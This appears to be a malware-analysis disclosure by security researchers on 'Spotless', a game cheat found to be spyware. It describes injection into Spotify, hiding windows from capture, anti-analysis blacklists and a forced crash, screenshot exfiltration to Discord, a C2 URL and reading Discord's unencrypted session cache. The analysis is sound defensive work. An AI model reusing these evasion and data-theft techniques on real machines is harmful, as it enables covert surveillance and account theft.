Spotless sold itself as an undetectable FiveM cheat. Under the hood it was spyware: silent desktop screenshots, Discord identity theft, forced BSODs, and a remote command channel across 601 accounts. Cloudflare already took down the payload links. Discord, Stripe, and authorities have the report.
A few days ago we dug into a paid FiveM and Fortnite cheat called Spotless. The pitch was simple: undetectable external, aimbot, ESP, HWID spoofing. Tagline: "Stay undetected, stay spotless." They also sell Spotless Spoofer.
VirusTotal said 0 detections. That does not mean clean. It means the file on disk is packed so scanners cannot read it.
What we found in memory was not "just a cheat." It was spyware.
While we dumped Spotify.exe to inspect it, the anti-tamper fired. It photographed our desktop and tried to upload that frame to the developer's Discord. No flicker. No toast. No consent.
A lot of buyers are kids, often on a family PC. Spotless does not care who is logged in. Screenshot + Discord scrape = whoever uses that machine. Fill in `command`, and a stranger can push work to that box.
Silent screen capture and remote control without consent is malware behavior — the kind computer-crime laws target. We are researchers, not a court. Here is what the binary does, and what we did about it.
We reported it to Discord Trust & Safety (investigating), Stripe, Cloudflare (R2 links already restricted), the C2 host, game platforms, and authorities. Victim identifiers are redacted below.
Most vendors would ship a detection and stop. We went after the source — loader, C2, R2 hosts, Discord guild, payments — because hashes do nothing against an in-memory SP7L pack.
Buyer instructions:
Process tree during a live run:
obs64.exe (PID 9228) ---> Spotify.exe (PID 2144)Everything under `%APPDATA%\Spotify` was real Spotify AB–signed code. No shady DLL on disk. The cheat injects into Spotify's memory after OBS starts it.
To hide the overlay from captures it calls:
SetWindowDisplayAffinity(hwnd, WDA_EXCLUDEFROMCAPTURE); // 0x00000011You can see the menu on the monitor. OBS, Discord screen share, and anticheat grabbers see a clean desktop.
Payload `fe45698beaa2237e` (~4.7 MB) came from the seller's Cloudflare R2 bucket. It is not a normal PE. Hex header:
0000: 53 50 37 4C 01 01 00 00 94 A0 AE 4A F5 B1 90 EC [SP7L...........J....]
SP7L = Spotless Loader magic
01 01 00 00 = version 1.1
next 8 bytes = IV / salt
SHA256: d66c841e43a08223982d5f110b43b48ecbb35b131638e425fc5972bb1e1574a3No `MZ` on disk → static AV often fails. Decryption happens in Spotify's process.
Disk looked clean, so we dumped live memory: Task Manager → Spotify.exe (PID 2144) → Create memory dump → `Spotify.DMP` (1.07 GB).
From RAM:
Auth body clients send (redacted):
{
"appid": "6907713df3e42f6e0026d777",
"discordId": "[REDACTED_DISCORD_ID]",
"hwid": "[REDACTED_SID]",
"version": "0.1"
}C2 heartbeat from the dump (redacted):
{
"timestamp": 1790157671573,
"sessionid": "[REDACTED]",
"command": null,
"webhookUrl": null,
"user": {
"username": "[REDACTED_USER_ID]",
"hwid": "[REDACTED_SID]",
"ip": "[REDACTED_IP]",
"lastlogin": 1790157099,
"createdate": 1788833441,
"expiry": 1791425441
},
"app": {
"name": "Public-Bypass",
"version": "0.1",
"totalUsers": 601,
"onlineUsers": 0
},
"expiry": 1791425441,
"hasAccess": true,
"expiresIn": 1267770
}Module downloads (Cloudflare R2):
We carved PNGs out of the dump and got the loader's own surveillance frames — our analysis desktop, still sitting in Spotify RAM.

From Spotify.exe RAM: Task Manager on PID 2144, cursor on "Create memory dump file" — when the trap fired.

Another staged frame from the same dump: PowerShell ISE parent-process audit (obs64.exe → Spotify.exe), Task Manager, VirusTotal still at 0 detections. Usernames redacted.
In the frames:
Frame → multipart body with `------SuspectScreenshotBoundary` → Discord webhook.
Blacklist in memory includes Task Manager, Process Hacker, Wireshark, API Monitor, x64dbg-class tools, plus ThreatLocker and Symantec Endpoint Protection.
If it decides you are inspecting it, it can also BSOD the PC via `RtlAdjustPrivilege` + `NtRaiseHardError`.
When it saw Task Manager + PowerShell on PID 2144:
trying url=https://popadas.com/api/ep/protect-detectedThen:
We dumped memory mid-upload, so the frame was still in RAM.
Plaintext in the dump:
[REDACTED_DISCORD_ID]:[REDACTED_USERNAME]:[REDACTED_EMAIL]
C:\Users\[REDACTED]\AppData\Roaming\discord\sentry\scope_v3.jsonDiscord's Sentry crash SDK caches session context in unencrypted JSON:
Tokens use DPAPI. This file does not. Any user-mode process can read it in milliseconds.
On a shared family login, that can be a parent's Discord — tied to a cheat buy they never made.
C2 / network
Payloads (R2)
Discord (TA)
Who we told

Cloudflare (23 Sep 2026): "We have restricted access to the reported URL(s)."
Hours later, Spotless Discord lit up: cheat loads then unloads, inject fails, "host has to be down."

Buyers: load → unload, asking staff for a fix.

"There host has to be down" / first outage with no announcement.

Inject broken: Fatal Error in ntdll.dll.
Staff blamed "domain provider instability" and told people to VPN before inject (even dropped a ProtonVPN link). Classic workaround when Cloudflare cuts distribution — no mention of the abuse report.

Staff: VPN before inject until "everything stabilizes."
Do not rely on Spotify.exe hashes.
ZeroTrust Forensic Scanner is built for this class: in-memory loaders, signed-process abuse, leftover execution artifacts.
"0 detections" is not a clean bill of health. Spotless hid as a non-PE pack, lived inside Spotify, and sold spyware as an aimbot.
601 people installed silent screenshots, Discord identity theft, crash-on-inspect, and a remote `command` channel. On a kid's family PC, that is a stranger with eyes on the household desktop.
We did not stop at a detection signature. We went after the source — dump, SP7L, C2, R2, Discord, Stripe, host abuse, law enforcement.
Cloudflare already killed the payload URLs. Discord is investigating. Stripe has the payment trail. Authorities have the package.
If you run a server: treat Spotless as malware. If you bought it: uninstall, rotate Discord, assume your screen may have been photographed — and stop handing strangers RCON to your home PC for ESP.